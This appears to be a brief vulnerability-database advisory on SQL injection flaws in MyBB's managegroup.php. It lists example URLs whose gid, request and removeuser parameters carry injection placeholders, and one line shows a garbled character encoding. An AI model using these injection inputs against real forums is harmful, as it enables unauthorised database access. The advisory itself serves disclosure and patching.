MyBB Managegroup.PHP SQL Injection Vulnerability

MyBB Managegroup.PHP SQL Injection Vulnerability

An exploit is not required.

Example URI have been provided:

http://www.example.com/mybb/managegroup.php?gid=8&action=do_joinrequests&request[sql]=accept

http://www.example.com/mybb/managegroup.php?gid=8'sql&action=joinrequests

http://www.example.com/mybb/managegroup.php?gid=8sql&action=do_manageusers

&removeuser[]=â??sql

http://www.example.com/mybb/managegroup.php?gid=8'sql